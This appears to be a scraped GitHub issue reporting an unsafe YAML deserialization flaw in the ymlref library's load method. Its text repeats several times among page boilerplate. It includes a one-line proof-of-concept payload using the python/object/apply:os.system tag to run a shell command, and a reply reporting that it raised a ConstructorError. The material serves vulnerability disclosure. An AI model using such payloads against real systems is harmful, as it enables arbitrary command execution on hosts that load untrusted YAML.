Hi, there is a vulnerability in load methods in ymlref.api.py,please see PoC above. It can execute arbitrary python commands resulting in command execution.
The text was updated successfully, but these errors were encountered:
Hi, there is a vulnerability in load methods in ymlref.api.py,please see PoC above. It can execute arbitrary python commands resulting in command execution.
It seems it didn't work. yaml.constructor.ConstructorError: could not determine a constructor for the tag 'tag:yaml.org,2002:python/object/apply:os.system' is raising
import ymlref.api
test_str ='!!python/object/apply:os.system ["dir"]'
ymlref.api.load(test_str,)
Hi, there is a vulnerability in load methods in ymlref.api.py,please see PoC above. It can execute arbitrary python commands resulting in command execution.
The text was updated successfully, but these errors were encountered: